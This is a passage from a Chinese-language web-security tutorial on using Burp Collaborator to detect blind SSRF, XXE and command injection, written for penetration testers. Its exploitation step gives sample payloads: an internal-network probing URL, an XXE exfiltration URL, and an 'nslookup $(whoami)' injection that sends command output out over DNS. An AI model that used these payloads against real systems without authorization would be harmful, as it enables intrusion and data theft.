3. 实战演练:如何使用 Burp Collaborator 检测盲漏洞
以下以检测 盲 SSRF 和 盲 XXE 为例。
步骤 1:生成 Collaborator Payload
打开 Burp Suite Professional。
转到 Burp 菜单 -> Burp Collaborator client。
点击 “Copy to clipboard” 复制为你生成的唯一 Collaborator 地址(例如 abc123def456.zmtests.com)。
你也可以点击 “Poll” 手动检查是否有交互。
步骤 2:构造并发送恶意请求
步骤 3:检查 Collaborator 交互
返回 Burp Collaborator client 窗口。
点击 “Poll now”。
如果漏洞存在,你将在下方看到详细的交互记录!
你能看到的信息包括:
DNS Query: 一次 DNS 查询,证明服务器尝试解析了你的域名。
HTTP Request: 一个完整的 HTTP 请求,包括方法、路径、头部(有时甚至会包含敏感信息如 Authorization 头、Cookie)。
来源 IP: 这可以帮你确认是哪个系统发起的请求(是应用服务器、数据库还是内部的其他系统?)。
步骤 4:利用漏洞
一旦确认漏洞存在,你就可以升级攻击:
探测内网: 将 Collaborator 地址替换为内网IP,如 http://192.168.1.1:8080/abc123def456.zmtests.com。如果服务器发起了请求,Collaborator 会收到,从而证明该内网IP和端口是可访问的。
窃取数据: 对于 XXE,你可以尝试通过 URL 参数将数据外带,例如:http://abc123def456.zmtests.com/?secret=%file;(需要嵌套实体)。
验证其他漏洞: 在 OS 命令注入中,可以注入类似 nslookup $(whoami).abc123def456.zmtests.com 的命令,将命令执行结果通过 DNS 查询外带。
4. Burp Collaborator 的优势
高效可靠: 无需依赖时间延迟或条件响应,结果清晰明确,极大提高了测试效率。
覆盖面广: 能检测多种类型的盲漏洞(SSRF, XXE, Blind SQLi, OS Commandi, etc.)。
隐蔽性强: 交互发生在服务器和 Collaborator 之间,与你的浏览器无关,更适合测试需要异步触发的漏洞(如需要管理员登录才能触发的 Blind XSS)。
信息丰富: 提供详细的交互日志,帮助深入分析漏洞利用场景和网络环境。
5. 注意事项
网络策略限制: 目标服务器必须能够访问互联网(出站流量不受限制),并且能解析外部DNS(如 8.8.8.8)。在某些严格的内网环境中可能无效。
防火墙/IDS/IPS: 出站流量可能会被安全设备拦截,导致无法收到交互。
公网可用性: 你需要能访问 Burp Collaborator 公共服务(zmtests.com)。对于高度敏感的环境,Burp Suite 允许你搭建私有的 Collaborator 服务器,但这需要一台有自己的公网IP和域名的服务器。
非万能工具: 它主要用于检测和数据外带。对于复杂的盲注数据提取(如从数据库中逐表取数据),虽然可能,但通常需要结合 Burp Intruder 等工具进行自动化,不如直接利用 SQLMap 等工具高效。
文章标签: 第三方网站系统测试 第三方网站测试 第三方网站测评 网站测试 网站安全 WEB安全测试 WEB安全 Web安全